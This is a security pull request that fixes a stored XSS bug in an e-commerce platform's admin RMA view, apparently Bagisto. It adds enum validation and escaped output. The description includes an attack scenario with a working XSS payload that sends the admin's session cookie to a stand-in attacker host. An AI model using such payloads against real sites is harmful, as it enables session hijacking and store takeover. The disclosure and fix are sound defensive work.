### PR TITLE
Fix Stored XSS in admin RMA view via unvalidated resolution_type (CWE-79)

### DIFF
--- a/packages/Webkul/Admin/src/Resources/views/sales/rma/returns/view.blade.php
+++ b/packages/Webkul/Admin/src/Resources/views/sales/rma/returns/view.blade.php
@@ -202,7 +202,7 @@
                                                     @if ($rmaItem['resolution'] == DefaultRMAResolution::RETURN->value)
                                                         @lang('admin::app.configuration.index.sales.rma.return')
                                                     @else
-                                                        {!! ucwords(str_replace('_', ' ', $rmaItem['resolution'])) !!}
+                                                        {{ ucwords(str_replace('_', ' ', $rmaItem['resolution'])) }}
                                                     @endif
                                                 </p>
 

--- a/packages/Webkul/Shop/src/Http/Controllers/Customer/Account/RMAController.php
+++ b/packages/Webkul/Shop/src/Http/Controllers/Customer/Account/RMAController.php
@@ -11,6 +11,8 @@ use Illuminate\Support\Facades\Mail;
 use Illuminate\View\View;
 use Webkul\Admin\Mail\Admin\RMA\CustomerToAdminConversationNotification;
 use Webkul\RMA\Contracts\RMAReason;
+use Illuminate\Validation\Rules\Enum;
+use Webkul\RMA\Enums\DefaultRMAResolution;
 use Webkul\RMA\Enums\DefaultRMAStatusEnum;
 use Webkul\RMA\Helpers\Helper as RMAHelper;
 use Webkul\RMA\Repositories\RMAAdditionalFieldRepository;
@@ -125,7 +127,7 @@ class RMAController extends Controller
             'order_id' => 'required|exists:orders,id',
             'order_item_id' => 'required',
             'rma_qty' => 'required',
-            'resolution_type' => 'required',
+            'resolution_type' => ['required', new Enum(DefaultRMAResolution::class)],
             'rma_reason_id' => 'required',
             'information' => 'nullable|string',
             'images' => 'nullable|array|min:1',


### PR DESCRIPTION
## Security Fix — Stored XSS via RMA `resolution_type` Field (CWE-79)

### Summary

- An authenticated customer can inject arbitrary HTML/JavaScript into the `resolution_type` field when submitting an RMA request — there is no enum/allowlist validation, only `required`.
- The value is stored raw in `rma_items.resolution` and rendered via `{!! !!}` (raw Blade output) in the admin RMA view.
- When an admin views the RMA, the injected script executes in their browser → admin session hijack → full store compromise.

**Severity**: High (CVSS 8.9 — `CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:L`)
**CWE**: CWE-79 — Stored Cross-Site Scripting
**Auth required**: Low (any customer account)

---

### Root Cause

**1. Missing input validation** (`RMAController.php:128`):
```php
// Before — accepts any string
'resolution_type' => 'required',

// After — only accepts valid enum values: 'return', 'cancel_items'
'resolution_type' => ['required', new Enum(DefaultRMAResolution::class)],
```

**2. Unsafe output** (`view.blade.php:205`):
```php
// Before — raw HTML output, XSS possible
{!! ucwords(str_replace('_', ' ', $rmaItem['resolution'])) !!}

// After — HTML-escaped output
{{ ucwords(str_replace('_', ' ', $rmaItem['resolution'])) }}
```

> Note: `ucwords(str_replace('_', ' ', ...))` does **not** prevent XSS — HTML tag names and event handler attributes are case-insensitive, so `<Img Onerror=...>` fires identically to `<img onerror=...>`.

---

### Attack Scenario

```
POST /customers/account/rma/store
resolution_type=<img src=x onerror=fetch('https://attacker.com?c='+document.cookie)>
```

Admin views RMA → `onerror` fires → attacker receives admin session cookie.

---

### Fix

Two changes, minimal diff:

1. **`RMAController.php`** — validate `resolution_type` against the `DefaultRMAResolution` enum (prevents malicious data from reaching the database).
2. **`view.blade.php`** — switch `{!! !!}` to `{{ }}` for defence-in-depth (safe even if DB already contains malicious data).

---

### Verification

Dynamically confirmed on Bagisto v2.2.2 (PHP 8.4.20 / Laravel 12.56.0). Payload `<img src=x onerror=alert(document.cookie)>` rendered as raw HTML in the admin panel DOM before the fix; rendered as `&lt;img...&gt;` (inert text) after the fix.